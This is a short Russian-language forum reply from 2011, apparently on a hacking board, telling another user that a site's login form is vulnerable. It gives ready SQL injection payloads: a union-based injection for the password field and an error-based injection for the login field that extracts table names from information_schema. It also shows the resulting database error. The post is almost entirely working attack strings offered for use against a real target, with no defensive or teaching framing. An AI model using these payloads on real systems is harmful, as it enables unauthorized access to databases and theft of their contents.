15.11.2011, 17:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
Kerny,
Уязвимость есть! Через Live HTTP Headers...
Сообщение от None
login=&account=&password='or+1=1)+union+select+1,2 +--+
Т.е. в поле Пароль:
Код:
Code:
'or+1=1)+union+select+1,2+--+
Error based, в поле логин:
Код:
Code:
'or+1=1)+and+(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+--+
Получаем:
Код:
Code:
Duplicate entry 'CHARACTER_SETS1' for key 'group_key'
P.S. Не обращай внимания на цифру "1" в конце.
P.S.S. Походу mq = on ...
|
|
|
|